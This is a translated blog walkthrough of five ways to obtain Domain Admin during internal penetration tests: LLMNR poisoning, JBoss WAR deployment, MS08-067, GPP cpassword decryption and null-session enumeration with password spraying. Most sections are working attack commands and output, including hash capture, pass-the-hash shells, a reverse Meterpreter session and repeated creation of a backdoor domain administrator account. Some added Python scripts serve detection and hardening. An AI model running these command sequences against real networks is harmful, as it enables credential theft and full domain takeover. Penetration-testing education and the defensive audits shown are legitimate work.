Mickey · 2013/09/26

From: blog.spiderlabs.com/2013/09/top…

SpiderLabs summed up their top five ways of getting Domain Admin on an internal network; I'll translate it briefly, with a little grumbling of my own.

1. NetBIOS and LLMNR Name Poisoning

This technique is very useful for penetrating Windows workgroups. Windows resolves a name in three steps: the local hosts file (%windir%\System32\drivers\etc\hosts), then the DNS server, then a NetBIOS broadcast. If the first two fail, the NetBIOS (or LLMNR) request is broadcast on the local segment, and any host on that segment can answer it. SpiderLabs' Responder tool answers these requests without any ARP spoofing. Metasploit can do the same (www.packetstan.com/2011/03/nbn.). Below is a Responder test run:

```
Responder.py -i 192.168.8.25
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C

[+]NBT-NS & LLMNR responder started
Global Parameters set:
Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF

LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was: wpad.
LLMNR poisoned answer sent to this IP: 192.168.8.12. The requested name was: 110.
... snip ...
NBT-NS Answer sent to: 192.168.8.6
[+] SMB-NTLMv2 hash captured from: 192.168.8.6
Domain is: BEACONHILLSHIGH
User is: smccall
[+] SMB complete hash is: smccall::BEACONHILLSHIGH:1122334455667788:reallylonghash
Share requested: \\ECONOMY309\IPC$
... snip ...
LLMNR poisoned answer sent to this IP: 192.168.8.11. The requested name was: wpad.
[+] SMB-NTLMv2 hash captured from:
Domain is: BEACONHILLSHIGH
User is: lmartin
[+] SMB complete hash is: lmartin::BEACONHILLSHIGH:1122334455667788:reallylonghash
Share requested: \\ADVCHEM311\IPC$
... snip ...
```

The captured LM, NTLMv1 or NTLMv2 hashes can be brute-forced with a GPU or rainbow tables. If a domain administrator's account was caught during the Responder session, you can run cmd.exe on a target directly with winexe:

```
~/work/nmap# ~/SpiderLabs/winexe-pth -U BEACONHILLSHIGH\\smccall%allison --uninstall --system //192.168.8.6 cmd.exe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain
net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.

C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.
```
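The defender's counterpart to the Responder run above is a canary: an LLMNR query for a name that cannot exist should go unanswered, so any host that replies is answering indiscriminately. This is an added example, not code from the SpiderLabs post or Responder; the canary name prefix and the 2-second wait are my own choices.

```python
"""LLMNR poisoning canary (added example, not code from the SpiderLabs post).
A host that answers a query for a name that cannot exist is poisoning answers."""
import random
import socket
import string
import struct

LLMNR_GROUP = "224.0.0.252"  # RFC 4795 IPv4 multicast group
LLMNR_PORT = 5355

def encode_name(name):
    """DNS wire encoding: length-prefixed labels ending in a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"

def build_query(name, txid):
    """LLMNR reuses the DNS header/question layout: flags 0, QDCOUNT 1, type A, class IN."""
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", 1, 1)

def skip_name(data, pos):
    """Advance past a wire-format name, including a compression pointer."""
    while True:
        length = data[pos]
        if length == 0:
            return pos + 1
        if length & 0xC0 == 0xC0:
            return pos + 2
        pos += length + 1

def parse_answer_ips(data, txid):
    """A-record addresses in a response to our txid; [] if it is not a response to us."""
    if len(data) < 12:
        return []
    rid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000:  # QR bit must be set on a response
        return []
    pos = 12
    for _ in range(qdcount):
        pos = skip_name(data, pos) + 4  # QTYPE + QCLASS
    ips = []
    for _ in range(ancount):
        pos = skip_name(data, pos)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(data[pos:pos + 4]))
        pos += rdlen
    return ips

def probe(timeout=2.0):
    """Send one canary query and collect every (source, answers) that comes back."""
    name = "canary-" + "".join(random.choices(string.ascii_lowercase, k=10))
    txid = random.randrange(1, 0xFFFF)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.settimeout(timeout)
    sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (src, _) = sock.recvfrom(512)
            ips = parse_answer_ips(data, txid)
            if ips:
                hits.append((src, ips))
    except socket.timeout:
        pass
    return name, hits

if __name__ == "__main__":
    canary, hits = probe()
    for src, ips in hits:
        print(f"ALERT: {src} answered LLMNR query for nonexistent '{canary}' with {ips}")
```

Run it periodically from a workstation on each segment; a silent run is the expected result, and an answer names the poisoner's address.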

2. JBoss vulnerabilities

Metasploit's auxiliary modules can be pointed at nmap port-scan results to identify common Java application servers. Take JBoss: weak passwords are among the most common findings, and the same goes for WebLogic, WebSphere, Tomcat and the other Java application servers; lately domestic government departments have been deploying Apusic a lot too (note that it needs the WAR packaged in its own format before you deploy it through the console). Besides weak passwords, JBoss also has an admin-console authentication bypass and the old 1337. The example below shows Metasploit brute-forcing the JBoss console and deploying a WAR package:

```
~/work/nmap# cat http.jboss.8080
msfcli auxiliary/scanner/http/dir_scanner THREADS=25 RHOSTS=file:./8080 DICTIONARY=./http.scan.list RPORT=8080 E
[*] Initializing modules...
THREADS => 25
RHOSTS => file:./8080
DICTIONARY => ./http.scan.list
RPORT => 8080
[*] Detecting error code
[*] Using code '404' as not found for 192.168.5.18
[*] Using code '404' as not found for 192.168.5.21
[*] Using code '404' as not found for 192.168.5.20
[*] Found http://192.168.5.20:8080/web-console/ 401 (192.168.5.20)
[*] http://192.168.5.20:8080/web-console/ requires authentication: Basic realm="JBoss JMX Console"
[*] Found http://192.168.5.20:8080/jmx-console/ 401 (192.168.5.20)
[*] http://192.168.5.20:8080/jmx-console/ requires authentication: Basic realm="JBoss JMX Console"
[*] Found http://192.168.5.21:8080/jmx-console/ 404 (192.168.5.21)
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed

Output from use auxiliary/scanner/http/jboss_vulnscan:
[*] 192.168.5.20:8080 /jmx-console/HtmlAdaptor requires authentication (401): Basic realm="JBoss JMX Console"
[*] 192.168.5.20:8080 Check for verb tampering (HEAD)
[+] 192.168.5.20:8080 Got authentication bypass via HTTP verb tampering
[+] 192.168.5.20:8080 Authenticated using admin:admin
[+] 192.168.5.20:8080 /status does not require authentication (200)
[+] 192.168.5.20:8080 /web-console/ServerInfo.jsp does not require authentication (200)
[+] 192.168.5.20:8080 /web-console/Invoker does not require authentication (200)
[+] 192.168.5.20:8080 /invoker/JMXInvokerServlet does not require authentication (200)

Output from use exploit/multi/http/jboss_maindeployer:
[*] Started reverse handler on 192.168.5.233:4444
[*] Sorry, automatic target detection doesn't work with HEAD requests
[*] Automatically selected target "Java Universal"
[*] Starting up our web service on http://192.168.5.233:1337/HlusdqEcokvXH.war ...
[*] Using URL: http://192.168.5.233:1337/HlusdqEcokvXH.war
[*] Asking the JBoss server to deploy (via MainDeployer) http://192.168.5.233:1337/HlusdqEcokvXH.war
[*] Sending the WAR archive to the server...
[*] Sending the WAR archive to the server...
[*] Waiting for the server to request the WAR archive....
[*] Shutting down the web service...
[*] Executing HlusdqEcokvXH...
[+] Successfully triggered payload at '/HlusdqEcokvXH/ewNYTEdFnYdcaOl.jsp'
[*] Undeploying HlusdqEcokvXH...
[*] Sending stage (30355 bytes) to 192.168.5.159
[*] Meterpreter session 1 opened (192.168.5.233:4444 -> ...) at 2013-09-15 19:00:06 -0600

meterpreter > sysinfo
Computer    : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\DELLBAC\EJBContainer\bin>whoami
whoami
beaconhillshigh\backup_admin

C:\>net user twadmin $piD3rsRul3! /add /domain
net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.

C:\>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.
```
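The "authentication bypass via HTTP verb tampering" the scanner reports comes from the shape of the security-constraint in the jmx-console's WEB-INF/web.xml: when a web-resource-collection lists specific http-method elements, the servlet container applies the auth-constraint only to those verbs, and HEAD, PUT, DELETE or any other verb reaches the protected URLs unauthenticated. The following added example (not code from the SpiderLabs post or JBoss) checks a web.xml for that weak shape and emits the corrected form; the sample web.xml is constructed in the shape of the stock jmx-console constraint.

```python
"""Find security-constraints that only cover listed HTTP verbs and rewrite them.
Added example; the sample web.xml is constructed, not copied from a JBoss release."""
import xml.etree.ElementTree as ET

def local(tag):
    """Strip a namespace ({uri}name -> name) so Java EE and DTD-style web.xml both parse."""
    return tag.rsplit("}", 1)[-1]

def weak_constraints(web_xml):
    """(resource-name, methods) for each web-resource-collection that names http-methods.
    Verbs not in the list are outside the auth-constraint, which is the bypass."""
    root = ET.fromstring(web_xml)
    out = []
    for sc in root.iter():
        if local(sc.tag) != "security-constraint":
            continue
        for wrc in sc:
            if local(wrc.tag) != "web-resource-collection":
                continue
            name = next((c.text.strip() for c in wrc if local(c.tag) == "web-resource-name"), "?")
            methods = [c.text.strip().upper() for c in wrc if local(c.tag) == "http-method"]
            if methods:
                out.append((name, methods))
    return out

def harden(web_xml):
    """Drop every http-method element so the constraint covers all verbs; returns XML text.
    The default admin:admin in conf/props/jmx-console-users.properties still needs changing."""
    root = ET.fromstring(web_xml)
    for parent in list(root.iter()):
        for m in [c for c in parent if local(c.tag) == "http-method"]:
            parent.remove(m)
    return ET.tostring(root, encoding="unicode")

# Constructed sample in the shape of the stock jmx-console WEB-INF/web.xml constraint.
JMX_CONSOLE_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
  <login-config><auth-method>BASIC</auth-method><realm-name>JBoss JMX Console</realm-name></login-config>
</web-app>"""

if __name__ == "__main__":
    print("weak:", weak_constraints(JMX_CONSOLE_WEB_XML))
    print(harden(JMX_CONSOLE_WEB_XML))
```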

3. MS08-067

This vulnerability is more than four years old, but many machines on internal networks are still unpatched. It affects Windows 2000, Windows Server 2003 and Windows XP. To be honest, I rarely use MS08-067 during internal penetration tests: an overflow is not a clean thing, it may crash the target (DoS) and get you noticed, which is not good, you know.

```
nmap --script=smb-check-vulns.nse -v -v -p 445,139 -iL smb -oA MS08
less MS08.nmap
... snip ...
Nmap scan report for shelob-squared (192.168.1.103)
Host is up (0.00042s latency).
Scanned at 2013-09-16 21:52:32 CDT for 55s
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:E3:25:78 (VMware)

Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE                                            <-- bingo, it's vulnerable
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
... snip ...
```

Nmap's NSE scripts are written in Lua and are very helpful for penetration testing, especially on Linux. On Windows a few scan types cannot be used, but NSE scripts still work. The nmap version that Linux distributions install by default is fairly old, though, so you cannot simply drop the NSE directory in. Last time I was reading Wooyun Drops, [email protected] said he had implemented an NSE script as well. I just want to say: can you secretly send me a copy?

Next, exploit the overflow with Metasploit. I don't know how well it works on Chinese-language systems:

```
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.215
LHOST => 192.168.1.215
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.215:33354 -> 192.168.1.103:4444) at 2013-09-16 21:54:15 -0500

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer        : SHELOB-SQUARED
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 48c76bfa334c4c21edd1154db541c2c2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
Frodo:"what do i have"
Samwise:"Frodo"
Stryder:"love"
Legolas:"favorite saying"
Gimli:"what am i"
Boromir:"what I am"
Gandalf:"moria"
[*] Dumping password hashes...
... snip ...
meterpreter > shell
Process 2708 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
MIRKWOOD\Gandalf

C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.

C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.
```
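From the defender's side, the smb-check-vulns report above is an inventory of what still needs the MS08-067 patch. The following added example (not code from the SpiderLabs post or nmap) parses nmap's normal-output format into a per-host table of check results and a patch list; the second host in the sample is constructed.

```python
"""Parse nmap smb-check-vulns normal output into {ip: {check: status}} and a patch list.
Added example; SAMPLE_NMAP is the report above plus one constructed clean host."""
import re

HOST_RE = re.compile(r"^Nmap scan report for (?:(\S+) \()?(\d+\.\d+\.\d+\.\d+)\)?")
# Script result lines look like "|   MS08-067: VULNERABLE" or "|_  MS07-029: NO SERVICE (...)".
CHECK_RE = re.compile(r"^\|_?\s+(.+?):\s+(\S.*?)\s*$")

def parse_report(text):
    """One dict of check -> status per host that printed an smb-check-vulns block."""
    hosts, current, in_section = {}, None, False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current, in_section = m.group(2), False
            hosts[current] = {}
            continue
        if current is None:
            continue
        if line.startswith("| smb-check-vulns:"):
            in_section = True
            continue
        if in_section:
            c = CHECK_RE.match(line)
            if not c:
                in_section = False
                continue
            hosts[current][c.group(1)] = c.group(2)
            if line.startswith("|_"):  # last line of the script's output block
                in_section = False
    return hosts

def needs_patch(text, check="MS08-067"):
    """IPs whose status for `check` starts with VULNERABLE (excludes NOT VULNERABLE)."""
    return sorted(ip for ip, r in parse_report(text).items()
                  if r.get(check, "").startswith("VULNERABLE"))

SAMPLE_NMAP = """Nmap scan report for shelob-squared (192.168.1.103)
Host is up (0.00042s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:E3:25:78 (VMware)

Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

Nmap scan report for 192.168.1.104
Host is up (0.00050s latency).

Host script results:
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|_  SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
"""

if __name__ == "__main__":
    print("patch MS08-067 on:", needs_patch(SAMPLE_NMAP))
```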

4. GPO cpassword

The principle is explained in Sleepy Dragon's excellent translation at drops.wooyun.org/papers/576. This article attacks Windows from Linux, and many people have no idea how to penetrate a Windows domain from Linux, especially once they have a webshell, or root on some box, or a foothold on the network, or a domain user's credentials (=.= as if the real world handed you such favourable conditions that often).

```
smbclient -W MIRKWOOD -U 'Legolas%orcs' \\\\192.168.1.105\\SYSVOL       <-- connect with smbclient
Domain=[MIRKWOOD] OS=[Windows Server 2008 R2 Standard 7600] Server=[Windows Server 2008 R2 Standard 6.1]
smb: \> dir
  .                                   D        0  Wed Sep 15 15:08:37 2012
  ..                                  D        0  Wed Sep 15 15:08:37 2012
  mirkwood.local                      D        0  Wed Sep 15 15:08:37 2012

                48457 blocks of size 4194304. 44175 blocks available
smb: \> cd mirkwood.local\
smb: \mirkwood.local\> dir
  .                                   D        0  Wed Sep 15 15:13:05 2012
  ..                                  D        0  Wed Sep 15 15:13:05 2012
  Policies                            D        0  Tue Oct 30 10:29:31 2012
  scripts                             D        0  Thu Nov  8 12:50:21 2012

smb: \mirkwood.local\> recurse
smb: \mirkwood.local\> prompt off
smb: \mirkwood.local\> mget Policies
... snip ...
getting file \mirkwood\Policies\PolicyDefinitions\access32.admx of size 98874 as access32.admx (3657.0 KiloBytes/sec) (average 3657.0 KiloBytes/sec)
getting file \mirkwood\Policies\PolicyDefinitions\access34.admx of size 131924 as access34.admx (27324.5 KiloBytes/sec) (average 7038.2 KiloBytes/sec)
getting file \mirkwood\Policies\PolicyDefinitions\ActiveXInstallService.admx of size 7217 as ActiveXInstallService.admx (2303.1 KiloBytes/sec) (average 6722.5 KiloBytes/sec)
getting file \mirkwood\Policies\PolicyDefinitions\AddRmvPrograms.admx of size 7214 as AddRmvPrograms.admx (2301.6 KiloBytes/sec) (average 6446.2 KiloBytes/sec)
getting file \mirkwood\Policies\PolicyDefinitions\asdf.admx of size 4249 as asdf.admx (122.0 KiloBytes/sec) (average 4940.4 KiloBytes/sec)
getting file \mirkwood\Policies\PolicyDefinitions\AppCompat.admx of size 4893 as AppCompat.admx (2633.2 KiloBytes/sec) (average 4835.6 KiloBytes/sec)
getting file \mirkwood\Policies\PolicyDefinitions\AttachmtMgr.admx of size 3865 as AttachmtMgr.admx (2912.5 KiloBytes/sec) (average 4752.0 KiloBytes/sec)
getting file \mirkwood\Policies\PolicyDefinitions\Autoplay.admx of size 5591 as Autoplay.admx ...
... snip ...
smb: \mirkwood.local\> recurse
smb: \mirkwood.local\> prompt off
smb: \mirkwood.local\> mget scripts
... snip ...
Get directory scripts? y
Get directory bin? y
Get file #INCLUDE.BAT? y
getting file \mirkwood\scripts\bin\#INCLUDE.BAT of size 2839 as #INCLUDE.BAT (409.6 KiloBytes/sec) (average 409.7 KiloBytes/sec)
getting file \mirkwood\scripts\bin\netlogon.bat of size 1438 as netlogon.bat (28.9 KiloBytes/sec)
getting file \mirkwood\scripts\bin\netlogon2.bat of size 16781 as netlogon2.bat (691.0 KiloBytes/sec) (average 566.0 KiloBytes/sec)
getting file \mirkwood\scripts\bin\netlogon3.bat of size 16486 as netlogon3.bat (1268.5 KiloBytes/sec) (average 773.6 KiloBytes/sec)
getting file \mirkwood\scripts\bin\netlogon4.bat of size 17429 as netlogon4.bat (1108.7 KiloBytes/sec) (average 858.8 KiloBytes/sec)
... snip ...
```

Once the files are downloaded, grep through both Policies and scripts for "Administrator" or "cpassword" (either works in this instance):

```
~/work/nmap/192.168.1.0-24/Policies# grep -ri administrator .
./{FC71D7SS-51E2-4B9D-B261-GB8C9733D433}/Machine/Preferences/Groups/Groups.xml:<Groups clsid="{3125E277-EB16-4b4c-6534-544FC6D24D26}"><User clsid="{HH5F1654-51E6-4d24-9B1A-D9BFN34BA1D1}" name="Administrator (built-in)" image="2" changed="2012-12-30 12:47:25" uid="{8E2D5E22-E914-438F-SS5D-FDDA92925BB7}" userContext="0" removePolicy="0"><Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
```

The cpassword value is then fed to the decryption script from http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html:

```
~/work# ruby decrypt.rb                                   <-- decrypt
Local*P4ssword!
~/work/nmap# ~/SpiderLabs/winexe-pth -U 'MIRKWOOD\\Administrator%Local*P4ssword!' --uninstall --system //192.168.1.103 cmd.exe     <-- winexe
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.

C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.
```
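Every domain user can read SYSVOL, so the grep above is something the domain's own administrators should run first. The following added example (not code from the SpiderLabs post or decrypt.rb) walks a SYSVOL copy, reports every Group Policy Preference item that still carries a cpassword attribute, and records which GPO, item and account it belongs to; the sample Groups.xml is constructed in the shape of the one found above, and the per-item account attribute names are my reading of the Preferences schema.

```python
"""Audit a SYSVOL mirror for Group Policy Preference items that embed a cpassword.
Added example; the sample tree is constructed, the cpassword value is a placeholder."""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Preference item files whose schema allows a stored (fixed-key AES) cpassword.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute naming the account the password belongs to, depending on item type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")
GPO_GUID_RE = re.compile(r"\{[^}/\\]{36}\}")  # GPO folder name in the path

def scan_xml_text(text, path="<memory>"):
    """One finding per element with a non-empty cpassword; item name and change
    date come from the owning element (e.g. <User ...> around <Properties ...>)."""
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return [{"file": path, "error": str(exc)}]
    parent = {child: p for p in root.iter() for child in p}
    findings = []
    for elem in root.iter():
        if not elem.get("cpassword"):
            continue
        owner = parent.get(elem, elem)
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
        gpo = GPO_GUID_RE.search(path)
        findings.append({"file": path, "gpo": gpo.group(0) if gpo else None,
                         "item": owner.tag, "name": owner.get("name"),
                         "account": account, "changed": owner.get("changed")})
    return findings

def scan_sysvol(root_dir):
    """Walk a SYSVOL copy and scan every GPP item file found under it."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for fn in files:
            if fn in GPP_FILES:
                full = os.path.join(dirpath, fn)
                with open(full, encoding="utf-8-sig") as fh:  # GPP files are often BOM-prefixed
                    findings.extend(scan_xml_text(fh.read(), full))
    return findings

# Constructed sample modelled on the Groups.xml the grep above turned up.
SAMPLE_GROUPS_XML = (
    '<Groups clsid="{3125E277-EB16-4b4c-6534-544FC6D24D26}">'
    '<User clsid="{HH5F1654-51E6-4d24-9B1A-D9BFN34BA1D1}" name="Administrator (built-in)" '
    'image="2" changed="2012-12-30 12:47:25" uid="{8E2D5E22-E914-438F-SS5D-FDDA92925BB7}">'
    '<Properties action="U" cpassword="CONSTRUCTED-PLACEHOLDER" subAuthority="RID_ADMIN" '
    'userName="Administrator (built-in)"/></User></Groups>')

def write_sample_tree():
    """Create a throwaway SYSVOL-like tree holding the sample; returns its root."""
    root_dir = tempfile.mkdtemp(prefix="sysvol-")
    gpo_dir = os.path.join(root_dir, "Policies", "{FC71D7SS-51E2-4B9D-B261-GB8C9733D433}",
                           "Machine", "Preferences", "Groups")
    os.makedirs(gpo_dir)
    with open(os.path.join(gpo_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return root_dir

if __name__ == "__main__":
    for finding in scan_sysvol(write_sample_tree()):
        print(finding)
```

Each finding is a GPO to edit: remove the stored credential from the preference item and rotate the account's password, since the value was readable by every domain member for as long as it sat there.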

5. NetBIOS Null Enumeration Allowed on Server

In other words, the domain server allows null-session connections: enumerate the account information over the null session, iterate over the users with enum4linux.pl on Linux, brute-force the accounts with Medusa, and execute commands with winexe. Which chapter of Hacking Exposed did you see this in?

```
~/enum4linux.pl -u MIRKWOOD\\Legolas -p orcs -w MIRKWOOD -a 192.168.1.90 >> enum-192.168.1.90.txt
~/work/targets/192.168.1.0-24# cat enum-192.168.1.90.txt
Starting enum4linux v0.8.7 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Sep 10 10:15:14 2013

 ==========================
|    Target Information    |
 ==========================
Target ........... 192.168.1.90
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ===================================================
|    Enumerating Workgroup/Domain on 192.168.1.90    |
 ===================================================
[+] Got domain/workgroup name: MIRKWOOD

 ===========================================
|    Nbtstat Information for 192.168.1.90    |
 ===========================================
Looking up status of 192.168.1.90
        MORDOR          <00> -         M  Workstation Service
        MIRKWOOD        <00> - <GROUP> M  Domain/Workgroup Name
        MIRKWOOD        <1c> - <GROUP> M  Domain Controllers
        MORDOR          <20> -         M  File Server Service

 ====================================
|    Session Check on 192.168.1.90    |
 ====================================
[+] Server 192.168.1.90 allows sessions using username '', password ''
... snip ...

 ============================
|    Users on 192.168.1.90    |
 ============================
index: 0x2b76 RID: 0xd08 acb: 0x00000610 Account: Administrator    Name: Administrator    Desc: (null)
index: 0x1822 RID: 0xb0a acb: 0x00000414 Account: Frodo            Name: Frodo Baggins    Desc: (null)
index: 0x1bga RID: 0xc0a acb: 0x00080210 Account: Samwise          Name: Samwise Gamgee   Desc: (null)
index: 0x1dc4 RID: 0xc7a acb: 0x00050210 Account: Stryder          Name: Aragorn          Desc: (null)
index: 0x1823 RID: 0xb0b acb: 0x00007014 Account: Legolas          Name: Legolas Greenleaf    Desc: (null)
index: 0x1824 RID: 0xb0c acb: 0x00010014 Account: Gimli            Name: Gimli son of Gloin   Desc: (null)
index: 0x1825 RID: 0xb0d acb: 0x00300014 Account: Boromir          Name: Boromir son of Denethor II   Desc: (null)
index: 0x126f RID: 0x9eb acb: 0x00004014 Account: Gandalf          Name: Gandalf the Gray     Desc: (null)
index: 0x1826 RID: 0xb0e acb: 0x00020015 Account: Gollum           Name: gollum           Desc: (null)
... snip ...

~/work/targets/192.168.1.90# cat enum-192.168.1.90.txt | grep "Domain Admins"
Group 'Administrators' (RID: 544) has member: MIRKWOOD\Domain Admins
group:[Domain Admins] rid:[0x200]
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD\Gandalf
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD\Stryder
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD\Administrator
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD\gollum
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD\Saruman
S-1-5-21-8675309254-522963170-1866889882-512 MIRKWOOD\Domain Admins (Domain Group)
S-1-5-21-1897573695-8675309227-1212564242-512 MORDOR\Domain Admins (Domain Group)

~/work/nmap/# medusa -M smbnt -H smb -u gollum -p gollum -m GROUP:DOMAIN | tee smb-gollum.medusa
ACCOUNT CHECK: [smbnt] Host: 192.168.1.1 User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.1 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (2 of 62, 1 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.100 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.105 (3 of 62, 2 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.105 User: gollum Password: gollum [SUCCESS]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.106 User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.106 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.107 (5 of 62, 4 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.107 User: gollum Password: gollum [SUCCESS]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.11 (7 of 62, 6 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.11 User: gollum Password: gollum [SUCCESS]
... snip ...

~/work/nmap# ~/SpiderLabs/winexe-pth -U MIRKWOOD\\gollum%gollum --uninstall --system //192.168.1.106 cmd.exe
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
MIRKWOOD\gollum

C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.

